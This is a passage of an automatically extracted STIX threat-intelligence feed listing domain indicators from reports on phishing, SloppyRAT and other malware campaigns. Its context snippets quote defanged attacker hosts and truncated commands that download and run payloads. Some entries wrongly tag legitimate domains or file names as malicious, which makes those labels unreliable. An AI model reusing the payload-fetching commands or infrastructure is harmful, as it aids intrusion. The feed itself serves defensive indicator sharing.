contact@eemusicclass[.]co[.]uk info@lifeones[.]com Email","pattern":"[domain-name:value = 'tovimbatista.pt']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3423d056-1db4-40ad-81f4-d111f9f9a7da","created":"2026-09-10T17:23:05.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: uinsure.co.uk","description":"Seen in \"Protecting organizations from AI-assisted executive impersonation and invoice fraud\" (Microsoft Security Blog). Context: ss Email address associated with bank account notifications@uinsure[.]co[.]uk info@tivityhealth[.]com no-reply@lumalisboa[.]com norep","pattern":"[domain-name:value = 'uinsure.co.uk']","pattern_type":"stix","valid_from":"2026-09-10T17:23:05.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/10/protecting-organizations-ai-assisted-executive-impersonation-invoice-fraud/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--00a4ae10-677a-49fe-93d3-3565de42a9eb","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 9342371634011778.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: following command line: \"C:\\Users\\[redacted]\\AppData\\Local\\9342371634011778.com\" -s -L --tlsv1.2 --ssl-no-revoke -o \"C:\\Users\\[redacted]\\Ap","pattern":"[domain-name:value = '9342371634011778.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--247fe0c2-84db-44b7-a6c1-6f1dea5e7fe1","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hostfxr.dll","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name f3b980dea . The config.py","pattern":"[domain-name:value = 'hostfxr.dll']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e9e068d-c10b-475e-b66c-4bf729bc7f56","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: linked4x.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: nger.exe to download and execute a batch script from finger.linked4x[.]com as shown in the command line below: \"C:\\windows\\system32\\","pattern":"[domain-name:value = 'linked4x.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d8c97f6-e6a9-403e-bcb3-74690c9bd2bb","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: skipraid.com","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: CastleLoader and CastleRAT components were downloaded from skipraid[.]com using the User-Agent string K8VGmQTrzX . Alongside Castle","pattern":"[domain-name:value = 'skipraid.com']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b952bd41-7610-4405-817a-be60e06fe881","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: stro7121.blob.core.windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: mory. This script downloaded a SloppyRAT DLL from hxxps[://]stro7121[.]blob[.]core[.]windows[.]net/dpp1/hostfxr[.]dll and invoked the DLL export name","pattern":"[domain-name:value = 'stro7121.blob.core.windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18d96cb9-c64b-48b6-9002-a23ebd02611f","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: system.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: ieve the number of milliseconds since boot. GetTickCount64 [System.Net.Dns]::GetHostName() / domain — Retrieves the host name or d","pattern":"[domain-name:value = 'system.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1da07528-d399-4940-a057-1818a03ca382","created":"2026-09-10T14:43:37.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: windows.net","description":"Seen in \"SloppyRAT: A New Tool For Ransomware Attacks\" (Zscaler ThreatLabz). Context: and execute a Python script from hxxps://stro7121.blob.core.windows[.]net/dpp1/config.py . SloppyRAT stager The config.py script’s","pattern":"[domain-name:value = 'windows.net']","pattern_type":"stix","valid_from":"2026-09-10T14:43:37.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Zscaler ThreatLabz","url":"https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55dfaa71-a761-479f-9bf1-1eb0ac720dd5","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 7.tcp.eu","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 67.15[.]169 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File nam","pattern":"[domain-name:value = '7.tcp.eu']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c62810b-308f-46d5-92b0-188924f3b039","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: discord.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 41cf9a0d26 Mercurial Grabber infostealer binary URL https://discord[.]com/api/webhooks/995445114254139543/NmpxQmuBCD6sm3UkVvupGtx-Y","pattern":"[domain-name:value = 'discord.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8122afa-3afb-44ac-83dd-cbee29d0adc2","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: flow.lavasoft.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: le-analytics.l.google.com 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwa","pattern":"[domain-name:value = 'flow.lavasoft.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d4760ea2-d0cb-4004-8baa-53ed4bf4add1","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mobile-service.segment.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: .com 0.0.0.0 cdn.segment.com 0.0.0.0 api.segment.io 0.0.0.0 mobile-service.segment.com Entries added to the Windows hosts file by DCRAT Domain / I","pattern":"[domain-name:value = 'mobile-service.segment.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed1472fb-ed40-46d8-b7d1-6c4f02ddadfe","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ngrok.io","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 69 Infrastructure contacted by NJRAT Domain / Port 7.tcp.eu.ngrok[.]io:12684 ngrok endpoint contacted by NJRAT File names / MD5","pattern":"[domain-name:value = 'ngrok.io']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d91898c-3395-4fc8-861c-93e49acc4035","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: telemetry.servers.getgo.com","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: 0.0.0.0 static.hotjar.com 0.0.0.0 flow.lavasoft.com 0.0.0.0 telemetry.servers.getgo.com 0.0.0.0 telemetry.malwarebytes.com 0.0.0.0 ws.mcafee.com 0.","pattern":"[domain-name:value = 'telemetry.servers.getgo.com']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c53a6ffe-be21-4d3e-ada3-d89e7d28ca05","created":"2026-09-10T14:23:36.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xsph.ru","description":"Seen in \"Hackers Use Fake GTA 6 Downloads to Deploy RATs, Infostealers and Data-Wiping Malware\" (Cyber Security News). Context: he Windows hosts file by DCRAT Domain / IP address a0700877.xsph[.]ru 141.8.197[.]42 DCRAT command-and-control infrastructure F","pattern":"[domain-name:value = 'xsph.ru']","pattern_type":"stix","valid_from":"2026-09-10T14:23:36.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-gta-6-downloads/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99a52500-36b3-4a28-a22d-e0bfeb4e8adb","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bloom.io","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description Domain cdn.bloom[.]io External resource host loaded through the Microsoft Teams","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79e581f6-353b-4656-82e8-69d9dee64ce5","created":"2026-09-10T14:04:56.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: login.microsoftonline.com","description":"Seen in \"Hackers Use Blob URLs and Microsoft Teams to Create Phishing Pages Inside Victims’ Browsers\" (Cyber Security News). Context: st loaded through the Microsoft Teams redirect chain Domain login.microsoftonline.com Legitimate Microsoft OAuth endpoint used in the initial red","pattern":"[domain-name:value = 'login.microsoftonline.com']","pattern_type":"stix","valid_from":"2026-09-10T14:04:56.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-use-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--df49ed28-8ea6-4fe0-93da-4717ed24427a","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: add-passkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: y security Domain setupmypasskey[.]com Passkey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0132447c-5ff5-4ff3-ad01-f5d9fb907016","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: integratedsso.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey setup Domain add-passkey[.]com Passkey enrollment Domain integratedsso[.]com SSO Domain oktasession[.]com Identity-provider session Do","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea397526-4710-4203-be9f-c0fb9464a617","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: keysyncos.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: O Domain oktasession[.]com Identity-provider session Domain keysyncos[.]com Key synchronization Domain oskeysync[.]com Key synchroniz","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7650dd60-14d0-45b7-8528-76dee6944eb1","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: myconnectkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: istration Domain syncmykey[.]com Key synchronization Domain myconnectkey[.]com Key connection Domain oskeyconnect[.]com Key connection D","pattern":"[domain-name:value = 'myconnectkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4317222a-83da-4163-a654-3db88219228a","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oktasession.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: om Passkey enrollment Domain integratedsso[.]com SSO Domain oktasession[.]com Identity-provider session Domain keysyncos[.]com Key sync","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13338139-613c-4dbd-afe4-be13cd39089b","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeyconnect.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: hronization Domain myconnectkey[.]com Key connection Domain oskeyconnect[.]com Key connection Domain validationsetupac[.]com Account val","pattern":"[domain-name:value = 'oskeyconnect.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d415168b-1252-4199-9a1b-ea47ada760df","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeyregister.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey synchronization Domain oskeysetup[.]com Key setup Domain oskeyregister[.]com Key registration Domain syncmykey[.]com Key synchronizati","pattern":"[domain-name:value = 'oskeyregister.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--556576a6-8056-416b-88ee-097af20318e8","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeysetup.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: onization Domain oskeysync[.]com Key synchronization Domain oskeysetup[.]com Key setup Domain oskeyregister[.]com Key registration Dom","pattern":"[domain-name:value = 'oskeysetup.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--758b6e8c-3ddb-45e7-a3c2-cad6c0f57296","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeysync.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: r session Domain keysyncos[.]com Key synchronization Domain oskeysync[.]com Key synchronization Domain oskeysetup[.]com Key setup Dom","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4d536ebe-c1d4-496b-a13a-1ce0a19854c7","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: m becoming a data breach. Type Indicator Description Domain passkeyhelpdesk[.]com Passkey support lure Domain secure-passkey[.]com Passkey","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9231d372-45a6-4c2b-8096-3accf0dd22ce","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: portalsetuphub.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: validationsetupac[.]com Account validation and setup Domain portalsetuphub[.]com Portal setup Note: IP addresses and domains are intention","pattern":"[domain-name:value = 'portalsetuphub.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3471fca9-5f1b-4521-a49e-c6de96b929a3","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: secure-passkey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: on Domain passkeyhelpdesk[.]com Passkey support lure Domain secure-passkey[.]com Passkey security Domain setupmypasskey[.]com Passkey setu","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71b74e9f-55d6-4c17-a080-5e3c8b11dd6d","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: setupmypasskey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: rt lure Domain secure-passkey[.]com Passkey security Domain setupmypasskey[.]com Passkey setup Domain add-passkey[.]com Passkey enrollment","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--02832789-bc68-4f77-b4e0-13435f7af10d","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: syncmykey.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: ey setup Domain oskeyregister[.]com Key registration Domain syncmykey[.]com Key synchronization Domain myconnectkey[.]com Key connect","pattern":"[domain-name:value = 'syncmykey.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--155c8503-42a1-43b8-9d5c-05c99e2d9e07","created":"2026-09-10T13:23:09.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: validationsetupac.com","description":"Seen in \"Hackers Use Passkey-Themed Phishing to Hijack Microsoft 365 Accounts and Steal Cloud Data\" (Cyber Security News). Context: connection Domain oskeyconnect[.]com Key connection Domain validationsetupac[.]com Account validation and setup Domain portalsetuphub[.]com","pattern":"[domain-name:value = 'validationsetupac.com']","pattern_type":"stix","valid_from":"2026-09-10T13:23:09.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/passkey-themed-phishing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--802ffedd-fce6-40da-a226-3c4bb76fb369","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ip-109-091-184-021.um37.pools.vodafone-ip.de","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: utsche Telekom AG (AS3320), while 109.91.184.21 resolved to ip-109-091-184-021.um37.pools.vodafone-ip.de and belonged to a Vodafone GmbH static B2B customer pool (A","pattern":"[domain-name:value = 'ip-109-091-184-021.um37.pools.vodafone-ip.de']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a2fd51d0-50c9-4d3b-89fb-eb99e5155450","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: mail3.kekew.info","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: erse-DNS information showed that 80.152.203.134 resolved to mail3.kekew.info and was allocated to Deutsche Telekom AG (AS3320), while 10","pattern":"[domain-name:value = 'mail3.kekew.info']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4fd10fd4-08dd-4d71-9ab2-2eb76d4a54f7","created":"2026-09-10T10:57:11.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bloom.io","description":"Seen in \"New Phishing Attack Uses Blob URLs to Hide Malicious Pages From Security Scanners\" (GBHackers). Context: r ultimately leads Teams to load external content from cdn. bloom[.]io. Rather than displaying that content as a normal external","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T10:57:11.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/phishing-attack-uses-blob-urls/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--819964b5-2cb0-44ec-bed8-fba113e2b557","created":"2026-09-10T10:00:43.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: example.com","description":"Seen in \"The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE\" (Palo Alto Unit 42). Context: >/<path> (Figure 1). Figure 1. SPIFFE ID. The middle part ( example[.]com ) in Figure 1 is the trust domain, the issuer of identity","pattern":"[domain-name:value = 'example.com']","pattern_type":"stix","valid_from":"2026-09-10T10:00:43.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 